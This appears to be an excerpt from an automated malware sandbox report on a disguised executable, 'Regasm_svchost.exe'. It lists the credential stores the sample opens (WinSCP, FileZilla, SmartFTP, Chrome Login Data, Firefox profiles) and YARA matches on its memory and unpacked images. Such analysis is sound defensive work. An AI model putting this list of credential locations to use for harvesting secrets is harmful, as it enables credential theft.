Source: C:\Users\Public\Regasm_svchost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Regasm_svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174667673.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR